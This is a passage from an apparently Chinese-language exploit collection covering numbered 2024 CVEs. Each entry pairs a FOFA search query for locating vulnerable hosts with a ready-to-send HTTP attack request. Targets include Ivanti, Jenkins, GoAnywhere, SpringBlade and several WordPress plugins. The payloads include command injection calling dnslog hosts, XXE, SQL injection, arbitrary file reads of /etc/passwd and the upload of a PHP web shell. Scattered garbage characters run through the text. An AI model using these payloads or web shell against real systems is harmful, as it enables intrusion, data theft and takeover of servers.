m+ z R! G& |, b J) dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' A+ c" C v( d. U. X( LContent-Type: application/x-www-form-urlencoded; charset=UTF-8
! h& f, n9 C& `1 w+ \% b& @% T7 _+ OX-Requested-With: XMLHttpRequest
4 X& ?5 O7 q. y( S' }+ g
! @( i7 [8 J1 \7 W& f0 Aid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B# ~; j; s( [3 c- B! P- Y
, X& ^2 X# @- A/ E" B9 ^ ?& K, [$ b z5 C; P
99. Ncast盈可视高清智能录播系统busiFacade RCE1 D* d! L1 C0 w2 {0 Q0 P
CVE-2024-0305
/ d# S0 q5 W0 F( T0 W3 N7 {FOFA:app="Ncast-产品" && title=="高清智能录播系统". X2 c* @8 y8 \% h, S6 C$ X0 X
POST /classes/common/busiFacade.php HTTP/1.1
+ h0 a" [8 S* v) e- T- oHost: 192.168.40.130:8080
( ]) s" H9 \8 ?/ [$ {1 f: BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 u% w; [- e. x/ `' xConnection: close( m) O* E) v; N1 i$ `! `3 C
Content-Length: 154
. o4 \7 K5 h0 g# V& jAccept: */** v4 U( n/ F5 W) a
Accept-Encoding: gzip, deflate- K( O% I1 N4 T6 n$ z: }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, s8 G$ B8 B/ N2 O% a& E
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 E( z) L- S7 D b. ~! h
X-Requested-With: XMLHttpRequest
6 h) e. J; o' f8 ]1 ?
1 M# x! q3 |. ~% D%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
" E( ~9 @( C0 L$ }/ T1 B9 |' p! y1 P
8 @* D2 K; Q2 d/ K5 G7 V
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传+ f+ p& V/ n* k9 K
CVE-2024-03522 R4 C+ `' h9 S3 g s" d. j
FOFA:icon_hash="874152924"* n1 v( V4 W4 p K V p( h2 `' ~
POST /api/file/formimage HTTP/1.1
5 t& E4 [/ Y5 X6 |: d; RHost: 192.168.40.1304 {& O0 ?9 L7 U: N" q
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
/ I; F! ~2 y- L+ l5 |" m8 qConnection: close4 c2 d5 ?/ A. \5 h# W: W/ u% i
Content-Length: 201) S0 X# T. Z! @& \3 Z, u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Z7 N# v7 c$ H8 P% U! JAccept-Encoding: gzip9 @) _0 n' u$ ^6 }/ d5 f1 `
4 H' _+ l" F- J9 a& A+ M+ l# k
------WebKitFormBoundarygcflwtei( I4 U4 T" V5 n/ b* v( ?
Content-Disposition: form-data; name="file";filename="IE4MGP.php", t) A8 d1 @# _. I! D( O, C
Content-Type: application/x-php
8 }+ e B3 m A7 P, p# j1 k6 \3 \. _: Z* P: p: O# G9 ^
2ayyhRXiAsKXL8olvF5s4qqyI2O
8 Z* u- M* O/ F5 }9 s6 w$ O8 O------WebKitFormBoundarygcflwtei--5 N/ z q! d+ [, r- U) M' B6 ~
3 O# j/ s! ?$ [+ }8 Q
+ G+ Z- ^! c' c, V' Z
101. ivanti policy secure-22.6命令注入4 O) a$ g$ J3 ]/ ^; R8 w7 X
CVE-2024-21887
: y; m2 V7 [! { [! GFOFA:body="welcome.cgi?p=logo"5 E( Y3 p, `, ]5 _5 x5 V
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
0 m$ j1 W8 z9 I A9 P; F% H- w) WHost: x.x.x.xx.x.x.x
$ M" B4 x5 L; u/ |& z! tUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 d1 A9 j, V- z9 R' DConnection: close
. S( J- o/ V" i3 n0 j( IAccept-Encoding: gzip& \& _7 p# b/ O& P
3 R7 d6 ~1 j% Y' h5 C, X* y: R
% l$ E- I1 T. u. L2 i+ H# {0 p
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
6 _& r" A5 l4 s4 a. h1 a" L! l& N: O; WCVE-2024-218930 y) N& k) L# X
FOFA:body="welcome.cgi?p=logo"
) t* E* X. A3 p7 Y6 e7 n1 SPOST /dana-ws/saml20.ws HTTP/1.1/ L# M2 T" v' _/ `- J8 U+ C
Host: x.x.x.x1 B4 Q. _" z/ ]8 N: [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 S6 ?# ~0 S2 E8 H' T7 V3 U; HConnection: close5 l' U4 e# ~1 ~7 _
Content-Length: 7925 G( R- m; |3 `9 N# y
Accept-Encoding: gzip; Q* N1 Y; ~5 m0 _/ b r
! M% E* [& r% p6 i3 n
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope># Q+ z$ V( q( D/ Q" ^# I
6 i& p' l, C2 _, _
103. Ivanti Pulse Connect Secure VPN XXE
2 U7 { d/ b3 [CVE-2024-22024
$ B) @3 C" I" [" P; wFOFA:body="welcome.cgi?p=logo"
4 w& ^9 L# k% tPOST /dana-na/auth/saml-sso.cgi HTTP/1.1, t) o' A5 _9 U# M& j
Host: 192.168.40.130:111
& T* O+ a2 O0 f0 \4 Y& L/ |User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36. @2 u. g: Q' Z/ @$ j7 I
Connection: close
. V& y$ Z( N) ~Content-Length: 204/ E" y( Z7 C6 L
Content-Type: application/x-www-form-urlencoded
6 {9 j$ g6 p) }Accept-Encoding: gzip
' |. l! h+ o- i3 p
a9 o9 `3 l& Q! h9 nSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
9 M! h6 J; L S4 E0 S- J* ^1 `' I* _% H. ] \4 a2 I& A$ I0 c5 a
" |& M" U& M. e! D; _
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下/ I% |2 k% H9 O. k# _
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
: u1 o/ G) h; o
4 s* k: o) v; O C) ?( @" p$ Y9 z( B& |/ n) f F6 |
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
; g) w' A/ P4 S& b' Q9 zCVE-2024-0569: t# K1 k- I5 y: X7 E
FOFA:title="TOTOLINK"
9 G0 v7 f9 o. ^+ g! jPOST /cgi-bin/cstecgi.cgi HTTP/1.10 p1 X2 b0 a3 R' c. ]* F
Host:192.168.0.1
# o7 _( e) z: x0 x0 b2 uContent-Length:417 [! \; c; c* o4 q. \
Accept:application/json,text/javascript,*/*;q=0.01
0 D5 d8 d7 I) a; v5 }X-Requested-with: XMLHttpRequest
2 [6 p" r$ S6 ?( {User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
: j5 |& }% t0 f5 DContent-Type: application/x-www-form-urlencoded:charset=UTF-8" |0 P1 S* ^0 f6 W# K
Origin: http://192.168.0.13 j. f6 K: S+ t0 A' W
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
% Q: o$ N7 |3 O3 J8 RAccept-Encoding:gzip,deflate% r! b/ Y3 y+ S, l- x0 h, u( Q6 r' h; {4 x
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
2 n; `( C8 T- c+ [5 tConnection:close
& a$ F0 W- H4 n) w
, n% [; V) |2 n. \! ]{0 h# Z ~: H1 P0 C" x9 y/ z" y
"topicurl":"getSysStatusCfg",
1 Q; Y W: [6 K: C) ]# W" D"token":""8 M% w/ s/ I& N1 `% m9 d3 R
}
7 V8 Q2 J! k4 D& _5 H B$ j+ N" b1 I3 Z* Z9 t* \* ^1 l
105. SpringBlade v3.2.0 export-user SQL 注入. g* a# _+ _3 I- i+ o+ {% E
FOFA:body="https://bladex.vip"
& i9 A& D0 @' E' H8 u2 khttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
+ f! `8 \. i @! J
$ g7 m, `" f1 |; c106. SpringBlade dict-biz/list SQL 注入4 V6 k, F5 b' j. T8 s s7 B) A
FOFA:body="Saber 将不能正常工作" D4 u+ g( W- g
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
/ O* _% G* O/ oHost: your-ip/ j7 ~7 l* G4 z3 W+ y- C" ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 T4 @- i" a' i# O9 U7 h8 }( x2 m: GBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A3 V* j5 O5 ~! O. ^
Accept-Encoding: gzip, deflate/ T2 p1 t- p8 z9 X
Accept-Language: zh-CN,zh;q=0.9" @: _7 f$ u4 {. M6 n1 Q
Connection: close
3 n5 C. x% N* B/ d7 E: I# }( T0 u8 R6 P% v' M
, G: N; {% H' e+ @# p107. SpringBlade tenant/list SQL 注入# r1 E- m0 H# {* p& @ t: g
FOFA:body="https://bladex.vip"3 P1 h" G% @% g, _+ N1 ]
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1. n2 W A5 U4 x9 I4 m1 K
Host: your-ip/ @$ g0 j5 Q, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 T7 ~( O( K$ n( R$ S+ b4 I
Blade-Auth:替换为自己的
R* E* z$ T) GConnection: close+ W: S0 ^: Y9 g) j H( K$ x
5 @, R I# N/ l2 V
# c# f% q W$ @1 E9 l/ d) J, V
108. D-Tale 3.9.0 SSRF) |7 k, z; R4 x" {7 D2 J# h
CVE-2024-21642
1 p- O5 Z ]* p! b9 IFOFA:"dtale/static/images/favicon.png"
% A/ i+ N) v) D7 I" Z- F9 J2 ]GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1+ {) ~6 |4 L. B! m; j; {* `$ D
Host: your-ip
) b5 r& [# y8 h3 A8 PAccept: application/json, text/plain, */*1 G2 F: ?. A) W6 x& d k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 A1 J$ y/ M* q5 b, y; X, U lAccept-Encoding: gzip, deflate
8 w6 v5 H4 Y& M9 K W- Z& ?+ _Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
- v; W# O, H' I% PConnection: close
9 I: R2 W6 _: z# L+ h( c: M
& j3 k3 z) N9 L2 p1 ^
' b. \5 `0 F" o+ ?* U- d( r/ ?109. Jenkins CLI 任意文件读取8 e2 m; P5 w) p* ]# W- n
CVE-2024-23897
3 h; q+ b) D) ^FOFA:header="X-Jenkins") O% T/ x* n0 W( \# `$ s
POST /cli?remoting=false HTTP/1.1$ t8 q* N( i6 p9 b2 @8 I4 L: ~# S
Host:
$ ~# k# T% H4 B7 G8 ]& nContent-type: application/octet-stream, f4 j! r' {0 L0 w8 O1 \
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
) l# U) R$ D+ C9 k/ NSide: upload
8 r* h/ u* s% t z8 W/ WConnection: keep-alive
4 n/ [6 k7 |' f( r ]Content-Length: 163+ i) p0 q7 b9 L( m9 |5 N. _7 n, v
+ @% w8 q# X& s# F
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
9 c5 O6 |- _% p) c; n" w& Z% p( p" a N: m' x! N
! l8 u( N0 ?8 x& Z* s) ~
POST /cli?remoting=false HTTP/1.12 y" u6 g Q8 [2 I, m
Host:* |) T' s3 E1 U6 _5 ?. |. \2 S( I
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e924 T! n) C1 i5 u8 H: F. {' A5 _
download
9 H6 U- |( m( E$ _) L/ q* gContent-Type: application/x-www-form-urlencoded; W1 ?4 I# l2 m1 E2 f7 E
Content-Length: 0/ f6 {) j# Y1 _8 v5 a4 Y" K- S
; S- k. m' P6 O! z6 A% u
' J+ R9 @: [0 M! e* W' HERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
1 j! i* x+ n: u6 Ojava -jar jenkins-cli.jar help1 \8 a: k8 u1 H: g. [
[COMMAND], ]. p4 c9 e0 k3 V; ]! _$ J
Lists all the available commands or a detailed description of single command.: Y0 g+ x. b% @+ w9 h( x3 G" o
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)+ w" g$ C% Q5 d$ i2 N( r
2 M/ x$ D9 I; b$ T2 S
! `+ X) M4 Z5 m2 }% @: w8 Z110. Goanywhere MFT 未授权创建管理员2 `6 I( T& }" g3 V' }: A/ l$ U
CVE-2024-02041 |; J. C0 N E0 q5 p" L' `' b4 { {
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
5 p7 O. D) A cGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.13 y1 M" ]3 i3 ^+ ~
Host: 192.168.40.130:8000
6 \4 k$ C& q# h+ d3 d$ xUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36' U4 _. ~* Q: q: y
Connection: close4 Y' c1 _5 S* h8 B2 l3 g4 y
Accept: */*
1 }$ {) P) j2 wAccept-Language: en
9 v0 _. z3 f3 ?Accept-Encoding: gzip
( A; a2 c% S$ [3 |8 _1 {
" {% F* r r7 b B8 e& N
* _ K) ]% F6 z% _111. WordPress Plugin HTML5 Video Player SQL注入
0 m: g1 \# E0 G+ G" V4 TCVE-2024-1061
7 W! E6 M' a2 h) e9 B8 iFOFA:"wordpress" && body="html5-video-player"
; K. g L7 |" XGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1/ U) F9 i3 b' Z5 h' k% P- A" ]
Host: 192.168.40.130:112
& ]- N: n6 I1 `: r* ^User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. [- V! E$ a% X7 S$ Q0 E
Connection: close) `7 \# i2 d3 J/ w
Accept: */*, h! I: G- M' o) H5 P9 e" o
Accept-Language: en! ?$ i0 M9 c- e) a
Accept-Encoding: gzip) R0 J% O( \- L4 D5 o5 E+ V0 J' q
: y2 p6 [2 }. t
$ Z+ A9 F* g, s- w3 q6 e112. WordPress Plugin NotificationX SQL 注入. s5 t( V+ O2 U# ?) u0 A
CVE-2024-1698' k& v' ~' u2 ^9 `1 G/ w, x
FOFA:body="/wp-content/plugins/notificationx". X% x7 k/ t$ I5 U3 |
POST /wp-json/notificationx/v1/analytics HTTP/1.1, n5 ~- x7 ~" J0 T
Host: {{Hostname}}7 A8 w( m, H$ G( F9 b& ]$ r5 A
Content-Type: application/json0 T! [4 X# q1 K7 C7 i2 \# m
" l7 s i3 ?# S4 P6 X8 T7 X/ W
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
0 E1 D3 I/ ?0 R% ]" {+ r. r
5 S# ^$ Y& y" J) h4 I) l- ]0 r% \- h: i9 C3 { b5 m
113. WordPress Automatic 插件任意文件下载和SSRF& Z. \& \7 c1 h* C
CVE-2024-27954* `# ], s& n/ G7 \
FOFA:"/wp-content/plugins/wp-automatic"" c8 q; P5 F6 |4 @$ u+ u& b
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1' ~9 o; G( P$ |2 T, ^
Host: x.x.x.x
! K6 i9 ]3 J1 zUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.362 `% s. }" K) M9 A5 p
Connection: close
\7 C: J# Y# y {/ Y/ R% r& a7 cAccept: */*
. M* j, T# l4 ~- o% A4 t8 EAccept-Language: en
& F s$ b" q. i$ P- f. _Accept-Encoding: gzip
2 |9 w }$ S0 q, D. L; H0 A# L* O! ~: m* h/ D
' P) a: Y( E& `114. WordPress MasterStudy LMS插件 SQL注入
+ s( S4 x% x. g; i, TFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
# c0 i, ^% |# v; {GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.10 W' r% G, s s
Host: your-ip8 C+ z! B" k p
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! i$ l5 y: v! S: Q5 PAccept-Charset: utf-8) ~3 G# G. ? }+ H3 n' x, ?0 h( }
Accept-Encoding: gzip, deflate
1 [/ {3 s9 T0 a6 C6 DConnection: close
/ q/ H+ Z- ^1 v( ]! k6 U
1 d: E( G0 |/ F: p1 E9 D0 {5 t
( f; L S% a6 P- `115. WordPress Bricks Builder <= 1.9.6 RCE2 p# w+ Q/ g, r% L" g
CVE-2024-25600
, e9 c# H5 L: ^8 @FOFA: body="/wp-content/themes/bricks/"; X0 R, m* Z- o8 a% j" X! N( |
第一步,获取网站的nonce值
. p! l; ?% k# FGET / HTTP/1.18 W D; b1 a, @+ I! D
Host: x.x.x.x/ X8 d4 T/ K; p6 L
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
& \; M+ b4 D, n1 H' cConnection: close
9 X' e$ A# e) O9 ZAccept-Encoding: gzip9 \5 U/ W* @5 B% D/ m
& {8 m) `, ^3 c$ x3 ?& e. y
. A$ v) u. U2 B第二步替换nonce值,执行命令: E. {- J7 [' h
POST /wp-json/bricks/v1/render_element HTTP/1.1
/ P% C: ^) W p' i& y' D( UHost: x.x.x.x+ u( K# F6 x! a0 ^2 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% b! W; s3 R m' dConnection: close! B @2 `% i+ q, ^
Content-Length: 356
% F" q& r% A' w& lContent-Type: application/json
$ p3 U% V* R0 ~5 b7 T" g) z# w: MAccept-Encoding: gzip
+ D' _ n. C N* _ v% u0 e" c; ]; X" |' x8 Q* S; ]4 k" @ |! F' Y
{0 p# K7 e$ W; S) z
"postId": "1",
! j& e9 r/ x4 f3 R "nonce": "第一步获得的值",1 [, A4 s3 y) v
"element": {9 \# T0 ^0 E) {0 ?5 C5 H$ N$ i
"name": "container",& r7 w% w( a: t5 _; f: ~7 a2 m" S
"settings": {7 I# |% ^0 x* ` C# a! W0 U
"hasLoop": "true",
: H8 l, E3 F- K* a "query": {- }( J; b4 i8 ]/ r
"useQueryEditor": true,8 b: M$ H4 j+ T( P- _) ^
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
* |5 V$ C% i9 p2 z9 T% o "objectType": "post"! X# q# U6 J$ C0 M
}
+ S' r3 S j. G$ n, i. ^! K }
: R( W% \1 q3 C4 O* q! { }8 _$ s! a3 W6 n- e
}
9 n% d4 w; Q& \4 a! B8 X& Y3 g- {
. e2 S2 Y: D- d1 ?/ N+ P# f116. wordpress js-support-ticket文件上传. d% B. |. m1 K5 B( U
FOFA:body="wp-content/plugins/js-support-ticket". T O0 V: v! \$ U) f
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
8 m' K- s/ {& Q) VHost:
/ b. J3 Z/ K M- B& l# F" BContent-Type: multipart/form-data; boundary=--------7670991715 K; }. [' v5 l( r; Z
User-Agent: Mozilla/5.0
7 h( b+ _- l+ \; O3 J: ]
9 K1 l- C& x5 A$ @3 z |----------767099171
. |- S2 E* s. a1 ~9 J5 p9 { Q; p, Y( fContent-Disposition: form-data; name="action"
9 c7 E: [$ V4 [, Nconfiguration_saveconfiguration8 D+ y% j Z2 Y( M
----------767099171( L5 l( ? ^. _
Content-Disposition: form-data; name="form_request"1 F/ j$ F. o5 v+ J* t9 j+ Z- d# Y
jssupportticket
) r+ G& x1 c- R5 z" d----------767099171! F) V1 `5 x. m+ b( \- ~9 l1 m
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"4 ^5 ?) V* b" y! E! J" E
Content-Type: image/png) V) N" t3 u4 b: V7 Z
----------767099171--$ \5 P1 b1 \1 h( C4 y, \
& s5 D& B, M! j1 Y/ s3 R' Y# j: g3 c" l; z% ~5 |- A
117. WordPress LayerSlider插件SQL注入3 O8 f2 [! J" k/ |8 f5 L/ X
version:7.9.11 – 7.10.0
7 y4 w4 _! ]0 RFOFA:body="/wp-content/plugins/LayerSlider/"
& W; m4 O7 `/ p* v3 XGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1% d( R/ w# N3 J1 C+ {' f
Host: your-ip
2 V3 ?1 n, o# L4 R" X' S. dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: n8 T. z3 K9 ]5 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 z; C. f% C; ?0 v- q: s( w: Y) zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! K; m/ z0 B9 l" t7 aAccept-Encoding: gzip, deflate, br
( k- h5 @+ [, g2 M' BConnection: close% Q# G0 f' Z0 Q; D' Y/ k# Q' b1 n
Upgrade-Insecure-Requests: 1
9 u$ ?, w V+ |" C0 H. z+ W( z* c
% U2 |3 _# B% ?* I5 r
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传, A/ ^2 J9 `/ Z) E5 G
CVE-2024-0939- N$ K+ J2 z& ~6 z
FOFA:title="Smart管理平台"
& a# n3 u- q* f* LPOST /Tool/uploadfile.php? HTTP/1.1" U* n! B' L* S W
Host: 192.168.40.130:8443: K" n3 y1 v8 }( C7 P3 D
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8- Z; E1 k O& S6 Y, m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
& ^) x l4 u+ h3 x8 |" WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ m9 [' r& _3 N0 q; W' f0 p5 i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, M8 @% f( N$ F4 W: ?4 ]Accept-Encoding: gzip, deflate
; x. z2 c1 [8 m" x& o2 J( eContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887- i2 ]- s* _# L8 ]
Content-Length: 405
, `1 \6 a5 i& z) o* `1 Z) Z4 G( t9 bOrigin: https://192.168.40.130:84431 Q* @7 e, G" G% b- L
Referer: https://192.168.40.130:8443/Tool/uploadfile.php& D8 ]. t% X _9 {( R! }7 E+ F
Upgrade-Insecure-Requests: 1( y0 g% I! f8 W7 t3 T Q! t4 m
Sec-Fetch-Dest: document
% n i0 p+ e' p/ k5 U) q$ gSec-Fetch-Mode: navigate
4 r G7 o4 c) ^2 iSec-Fetch-Site: same-origin5 g- i% @/ I$ o- |
Sec-Fetch-User: ?1
# p' P s1 k: s5 p. R% M. F: {Te: trailers4 \3 U; a7 p, M) ?4 I' v( U) F+ ^
Connection: close# _' S2 }( M% F* [
, Q! L5 C3 ]; c( @5 W; I. l-----------------------------13979701222747646634037182887' s" P9 d. Z* ^; t
Content-Disposition: form-data; name="file_upload"; filename="contents.php"- V4 o% l. ^- i5 s
Content-Type: application/octet-stream. L) P; Y- m$ K- T: n) |
" c7 W6 c0 p# H4 R! [6 u<?php' w# x1 Q0 \! I `
system($_POST["passwd"]);* P, @' X9 p; ~
?>
4 z8 N8 Q4 ?. ~' F0 i-----------------------------13979701222747646634037182887
" ~$ v' s$ Q) W2 O+ E/ mContent-Disposition: form-data; name="txt_path"
* j& m8 k0 R: A9 F- y8 J- x! a2 M; ?3 q* B4 m" a4 O, S
/home/src.php
+ |% |1 v1 M$ E" X. ~. ]6 J-----------------------------13979701222747646634037182887--
# c! o- l% `$ ?1 z
5 k }9 L0 L' Z% W& p
3 S# b9 z# {- L' n. a访问/home/src.php
& h8 T6 w. o @7 [3 |( ^" ]; a
% b- B0 {" l; O0 s1 a, H5 w119. 北京百绰智能S20后台sysmanageajax.php sql注入
4 ]: z3 D2 y; S7 G0 }CVE-2024-12542 `* T6 l$ ]5 ?! k
FOFA:title="Smart管理平台"' d, Y2 B6 r# e. n3 ^
先登录进入系统,默认账号密码为admin/admin
. i0 U; z0 I; P9 u' G, SPOST /sysmanage/sysmanageajax.php HTTP/1.11
/ L$ E) q1 C, d8 [$ ZHost: x.x.x.x4 d+ D/ K4 A6 d( U6 {% `
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
; g: e; [. [* PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
1 g$ @6 }# G" l( dAccept: */*: D; s9 k. y2 t" e( K3 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( `7 @ E/ W/ H: a
Accept-Encoding: gzip, deflate
- @" M5 o/ L. j" \7 QContent-Type: application/x-www-form-urlencoded;. u2 H. J7 F, M p# \
Content-Length: 109
X+ D* m7 z4 vOrigin: https://58.18.133.60:8443
- z9 F; l$ n) ?2 Z6 X7 O' O, L: P( PReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
/ x7 N W9 H4 V9 m& hSec-Fetch-Dest: empty9 q: I$ q9 I5 ~0 Y
Sec-Fetch-Mode: cors, y: x5 }5 Y9 l8 F: Z! Z m7 x6 p
Sec-Fetch-Site: same-origin" n$ a4 n _. z# f) A; T
X-Forwarded-For: 1.1.1.1
" P0 O: @5 c! a ZX-Originating-Ip: 1.1.1.1
4 F) ~- k, V! \( J: f7 ~: PX-Remote-Ip: 1.1.1.1; m" j/ ^. n3 {7 t F
X-Remote-Addr: 1.1.1.1- {0 z* k- F0 F
Te: trailers3 ]/ q- Z: O6 a
Connection: close
